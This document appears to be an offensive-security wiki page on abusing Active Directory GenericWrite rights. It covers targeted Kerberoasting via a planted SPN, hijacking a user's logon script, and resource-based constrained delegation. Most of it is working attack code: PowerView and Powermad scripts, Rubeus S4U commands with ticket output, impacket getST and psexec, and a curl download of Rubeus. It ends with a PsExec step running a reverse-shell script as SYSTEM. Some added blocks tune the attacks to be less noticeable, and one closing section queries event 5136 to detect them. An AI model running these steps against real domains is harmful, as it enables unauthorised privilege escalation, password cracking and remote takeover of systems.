# GenericWrite

## User has GenericWrite over another user

GenericWrite on a user object lets us write to almost all of its attributes, but not reset its password. Two ways to turn that into something useful:

* Set a `servicePrincipalName` on the account and Kerberoast it: any domain user can then request a service ticket for that SPN, and the ticket is encrypted with a key derived from the target's password, so it can be cracked offline. This only pays off if the password is weak enough to crack.
* Set the `scriptPath` attribute (the logon script) to a script we control. It runs in the user's context the next time the account logs on interactively; it never fires for accounts that only authenticate over the network.
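Before abusing either option it is worth confirming who actually holds the right. The following is an added example, not code from the original page: it uses PowerView's `Get-DomainObjectAcl` to list every principal with a write right over a user. It assumes `Powerview.ps1` is in the current directory and uses the page's `maria` as the target; the function name is mine.

```powershell
# Added example (not from the original page): enumerate write ACEs over a user with PowerView.
Import-Module .\Powerview.ps1

function Get-WriteAcesOverUser {
    param([Parameter(Mandatory)][string]$Identity)   # samAccountName, SID or DN of the target user

    # -ResolveGUIDs turns object-type GUIDs into attribute names, so a WriteProperty ACE
    # shows which attribute it covers ('All' means every attribute).
    Get-DomainObjectAcl -Identity $Identity -ResolveGUIDs |
        Where-Object {
            $_.ActiveDirectoryRights -match 'GenericWrite|GenericAll|WriteProperty|WriteDacl|WriteOwner'
        } |
        ForEach-Object {
            [pscustomobject]@{
                Target    = $Identity
                Principal = ConvertFrom-SID $_.SecurityIdentifier   # SID -> DOMAIN\name
                Rights    = $_.ActiveDirectoryRights
                Attribute = $_.ObjectAceType
                Qualifier = $_.AceQualifier                         # AccessAllowed / AccessDenied
                Inherited = $_.IsInherited
            }
        }
}

# Only allow ACEs are useful to us; a deny ACE on the same attribute wins over an allow.
Get-WriteAcesOverUser -Identity maria |
    Where-Object { $_.Qualifier -eq 'AccessAllowed' } |
    Format-Table -AutoSize
```

Entries for Domain Admins, SYSTEM and the object's own SELF are expected noise; the interesting rows are ordinary users or groups (such as `smith` in the page's example) holding GenericWrite, GenericAll, or WriteProperty on `servicePrincipalName` / `scriptPath` specifically.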

#### Setting an SPN

```
Import-Module .\Powerview.ps1

# Credentials of the account that holds GenericWrite over the target (smith -> maria)
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)

# The SPN value is arbitrary, but it must be unique in the forest: a duplicate SPN breaks Kerberos for both accounts
Set-DomainObject -Credential $Cred -Identity maria -Set @{serviceprincipalname='foobar/xd'}
```

or, from a session already running as the account that holds the right, with the built-in tool:

```
# -a adds the SPN without checking for duplicates; use -s instead if you want that check
setspn -a object.local/maria.object.local:1337 object.local\maria
```

Either way, check that the attribute now holds the value before Kerberoasting, and clear it again once you have the ticket so the change does not linger.
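The complete targeted-Kerberoast loop (set the SPN, request the ticket, put the attribute back) as an added example that is not part of the original page. It uses PowerView only, with the page's names (`object.local`, `smith`, `maria`, the `foobar/xd` SPN); the function name and the output file are assumptions.

```powershell
# Added example (not from the original page): targeted Kerberoast with cleanup, PowerView only.
Import-Module .\Powerview.ps1

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)

function Invoke-TargetedKerberoast {
    param(
        [Parameter(Mandatory)][string]$Identity,
        [Parameter(Mandatory)][pscredential]$Credential,
        [string]$SPN = 'foobar/xd'      # arbitrary, but must be unique in the forest
    )

    # Remember the current value so we can restore it instead of blindly clearing it.
    $before = (Get-DomainUser -Identity $Identity -Credential $Credential -Properties serviceprincipalname).serviceprincipalname

    Set-DomainObject -Identity $Identity -Credential $Credential -Set @{serviceprincipalname = $SPN}

    try {
        # Request a TGS for the user's SPN. The ticket is encrypted with the target's
        # password-derived key, so the Hashcat-formatted output can be cracked offline.
        Get-DomainUser -Identity $Identity -Credential $Credential |
            Get-DomainSPNTicket -Credential $Credential -OutputFormat Hashcat |
            Select-Object -ExpandProperty Hash
    }
    finally {
        # Always undo the attribute change, even if the ticket request failed.
        if ($before) {
            Set-DomainObject -Identity $Identity -Credential $Credential -Set @{serviceprincipalname = $before}
        } else {
            Set-DomainObject -Identity $Identity -Credential $Credential -Clear serviceprincipalname
        }
    }
}

# Hashcat mode 13100 (Kerberos 5 TGS-REP etype 23) cracks the result:
#   hashcat -m 13100 maria.hash wordlist.txt
Invoke-TargetedKerberoast -Identity maria -Credential $Cred | Out-File -Encoding ascii maria.hash
```

If `$before` was already populated, the account was Kerberoastable without any write at all; the SPN write only matters for users that had none.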

#### Changing the logon script

```
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('object.local\smith', $SecPassword)

# spool\drivers\color is writable by any authenticated user by default, which makes it a handy drop location
cd C:\Windows\System32\spool\drivers\color
echo 'whoami > C:\Windows\System32\spool\drivers\color\poc.txt' > foo.ps1

# scriptPath is resolved on the machine where maria logs on: a local path like this one only works if she
# logs on to this box; otherwise point it at a UNC path on a share she can read (a bare relative path is
# looked up in the DC's NETLOGON share)
Set-DomainObject -Credential $Cred -Identity maria -Set @{scriptpath='C:\Windows\System32\spool\drivers\color\foo.ps1'}
```

## User / Computer has GenericWrite over computer

### RBCD

With GenericWrite over a computer object we can write its `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute, a security descriptor that lists the principals allowed to delegate (S4U2proxy) to that computer. We need a principal we control that has an SPN, normally a fresh machine account, which any domain user can create while `ms-DS-MachineAccountQuota` is at its default of 10. Once our SID is in that descriptor, S4U2self followed by S4U2proxy yields a service ticket to the target as any user who is not protected against delegation (not in Protected Users and not marked "account is sensitive and cannot be delegated").

* <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution>

```
PS C:\users\administrator\Desktop> . .\Powermad.ps1

# Create a computer account we control (works while ms-DS-MachineAccountQuota > 0)
PS C:\users\administrator\Desktop> New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
PS C:\users\administrator\Desktop> $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

# Security descriptor granting that SID full control; its binary form is what goes into the attribute
PS C:\users\administrator\Desktop> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\users\administrator\Desktop> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\users\administrator\Desktop> $SD.GetBinaryForm($SDBytes, 0)

# This is the write that GenericWrite over TARGET allows. Note that -Set replaces any existing value.
PS C:\users\administrator\Desktop> Get-DomainComputer TARGET | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
VERBOSE: get-domain
VERBOSE: [Get-DomainSearcher] ...

PS C:\users\administrator\Desktop> curl 192.168.255.255/Rubeus.exe -o Rubeus.exe

# Derive the machine account's Kerberos keys. RC4 does not depend on a salt, but the AES keys do: the
# salt for a computer account is built from the realm and the host name, so pass the realm (ECORP.COM,
# not the target host) as /domain and the account name with its trailing $.
PS C:\users\administrator\Desktop> .\Rubeus.exe hash /password:Summer2018! /user:attackersystem$ /domain:ECORP.COM

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 


[*] Action: Calculate Password Hash(es)

[*] Input password             : Summer2018!
[*] Input username             : attackersystem$
[*] Input domain               : ...
[*] Salt                       : ...
[*]       rc4_hmac             : <RC4_HMAC>
[*]       aes128_cts_hmac_sha1 : ...
[*]       aes256_cts_hmac_sha1 : ...
[*]       des_cbc_md5          : ...

# S4U2self + S4U2proxy as attackersystem$, impersonating administrator to the target's CIFS service.
# The impersonated user must not be in Protected Users or marked "sensitive, cannot be delegated".
PS C:\users\administrator\Desktop> .\Rubeus.exe s4u /user:attackersystem$ /rc4:<RC4_HMAC> /impersonateuser:administrator /msdsspn:cifs/TARGET.ECORP.COM /ptt

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 

[*] Action: S4U

[*] Using rc4_hmac hash: <RC4_HMAC>
[*] Building AS-REQ (w/ preauth) for: 'ECORP.COM\attackersystem$'
[*] Using domain controller: 255.255.255.255:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIF...

[*] Impersonating user 'administrator' to target SPN 'cifs/TARGET.ECORP.COM'
[*] Building S4U2proxy request for service: 'cifs/TARGET.ECORP.COM'
[*] Using domain controller: ...
[*] Sending S4U2proxy request to domain controller ....
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/TARGET.ECORP.COM':

```

With the CIFS ticket injected into the current session (`/ptt`), PsExec can reach the target's `ADMIN$` share as administrator. Here `x.ps1` is a script that starts a reverse shell, and `-s` runs it as SYSTEM:

```
# The -File path is resolved on TARGET, so x.ps1 must exist there (or be read from a share the target can reach)
c:\Users\Administrator\Desktop> .\psexec -s \\TARGET.ECORP.COM Powershell -ExecutionPolicy Bypass -File c:\users\administrator\desktop\x.ps1
```
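The RBCD write above replaces whatever was already in the attribute and never shows what ended up there. The following added example, which is not code from the original page, wraps the same steps in functions that check `ms-DS-MachineAccountQuota` first, append our SID to any existing descriptor instead of overwriting it, decode the attribute back to SIDs for verification, and remove only our own entry afterwards. It uses the page's names (`attackersystem`, `TARGET`, `Summer2018!`) and the same ACE string; the function names are mine, and PowerView plus Powermad are assumed to be in the current directory.

```powershell
# Added example (not from the original page): safer RBCD write with quota check, append, verify and undo.
. .\Powermad.ps1
Import-Module .\Powerview.ps1

# Same full-control ACE the page uses, with the SID substituted in.
$AceTemplate = '(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{0})'
$Attr        = 'msds-allowedtoactonbehalfofotheridentity'

function Get-MachineAccountQuota {
    # Number of computer objects any authenticated user may create (default 10, often set to 0 as a hardening step).
    (Get-DomainObject -LDAPFilter '(objectClass=domainDNS)' -Properties 'ms-ds-machineaccountquota').'ms-ds-machineaccountquota'
}

function Get-RbcdSids {
    param([Parameter(Mandatory)][string]$Computer)
    # -Raw returns the SearchResult so we get the untouched byte[] regardless of PowerView's property conversion.
    $r    = Get-DomainComputer -Identity $Computer -Properties $Attr -Raw
    $vals = $r.Properties[$Attr]
    if (-not $vals -or $vals.Count -eq 0) { return @() }
    $sd = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $vals[0], 0
    @($sd.DiscretionaryAcl | ForEach-Object { $_.SecurityIdentifier.Value })
}

function Set-RbcdSids {
    param([Parameter(Mandatory)][string]$Computer, [string[]]$Sids)
    if (-not $Sids -or $Sids.Count -eq 0) {
        # Nothing left to allow: clear the attribute rather than writing an empty DACL.
        Get-DomainComputer -Identity $Computer | Set-DomainObject -Clear $Attr
        return
    }
    $sddl  = 'O:BAD:' + (($Sids | ForEach-Object { $AceTemplate -f $_ }) -join '')
    $sd    = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $sddl
    $bytes = New-Object byte[] ($sd.BinaryLength)
    $sd.GetBinaryForm($bytes, 0)
    Get-DomainComputer -Identity $Computer | Set-DomainObject -Set @{ $Attr = $bytes }
}

# --- usage -------------------------------------------------------------------
$Target  = 'TARGET'
$NewHost = 'attackersystem'
$NewPass = ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force

if ((Get-MachineAccountQuota) -le 0) {
    # With a quota of 0, reuse a computer account (or any SPN-bearing account) you already control instead.
    throw 'ms-DS-MachineAccountQuota is 0: cannot create a machine account'
}
New-MachineAccount -MachineAccount $NewHost -Password $NewPass | Out-Null

$newSid   = (Get-DomainComputer -Identity $NewHost -Properties objectsid).objectsid
$existing = Get-RbcdSids -Computer $Target
if ($existing -notcontains $newSid) {
    Set-RbcdSids -Computer $Target -Sids ($existing + $newSid)   # append, do not clobber
}

# Verify: resolve every SID that is now allowed to delegate to the target.
Get-RbcdSids -Computer $Target | ForEach-Object { ConvertFrom-SID $_ }

# Cleanup when done: drop only our SID and leave any pre-existing entries intact.
# Set-RbcdSids -Computer $Target -Sids (Get-RbcdSids -Computer $Target | Where-Object { $_ -ne $newSid })
```

The Rubeus `hash` and `s4u` steps from the page are unchanged; this block only replaces the descriptor-building and `Set-DomainObject` lines. Keeping pre-existing entries matters on hosts where an administrator has legitimately configured RBCD, since clobbering them breaks that delegation and is a loud tell.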

Alternatively, once the attribute is set, the S4U2self/S4U2proxy exchange can be run from a Linux host with impacket (the realm and host names in this snippet differ from the Windows example above; substitute your own):

```
# Kerberos tolerates at most 5 minutes of clock skew, so sync with the DC first (Samba's net, needs root)
net time set -S dc01.ecorp.local

# S4U2self + S4U2proxy as the machine account we control, impersonating Administrator to the target's CIFS service
impacket-getST -spn cifs/dc01.ecorp.local -impersonate Administrator -dc-ip 192.168.xx.xx 'ecorp.local/attackersystem$:Summer2018!'

# getST prints the name of the .ccache it saved; point KRB5CCNAME at that file and use it with -k -no-pass
export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -no-pass -target-ip 192.168.xx.xx ecorp.local/Administrator@dc01.ecorp.local
```
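All three writes on this page (`servicePrincipalName`, `scriptPath`, `msDS-AllowedToActOnBehalfOfOtherIdentity`) are attribute modifications on directory objects, so on the defensive side they surface as Security event 5136 on the domain controller. The following is an added example, not from the original page, of pulling those events out on a DC; it assumes "Audit Directory Service Changes" is enabled and the objects carry a write SACL (without those, 5136 is never logged), and the function name is mine.

```powershell
# Added example (not from the original page): list 5136 events touching the attributes abused on this page.
# Run on a domain controller with an account that can read the Security log.
function Get-SuspiciousAdWrites {
    param([int]$Hours = 24)

    $watched = 'servicePrincipalName', 'scriptPath', 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    $filter  = @{ LogName = 'Security'; Id = 5136; StartTime = (Get-Date).AddHours(-$Hours) }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # 5136 carries its fields as <Data Name="..."> elements; flatten them into a hashtable.
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

        if ($watched -contains $d['AttributeLDAPDisplayName']) {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Who       = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                Object    = $d['ObjectDN']
                Attribute = $d['AttributeLDAPDisplayName']
                Value     = $d['AttributeValue']
                # %%14674 = Value Added, %%14675 = Value Deleted
                Operation = if ($d['OperationType'] -eq '%%14674') { 'Added' } else { 'Deleted' }
            }
        }
    }
}

Get-SuspiciousAdWrites -Hours 48 | Sort-Object Time | Format-Table -AutoSize
```

The useful triage question is whether `Who` is an account that should be editing that object at all: an ordinary user adding an SPN to another user, or a non-admin writing `msDS-AllowedToActOnBehalfOfOtherIdentity` on a computer, is the pattern this page describes. For the SPN case, an "Added" event followed shortly by an "Deleted" one for the same attribute, with a 4769 for that user's new SPN in between, is the full targeted-Kerberoast sequence.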
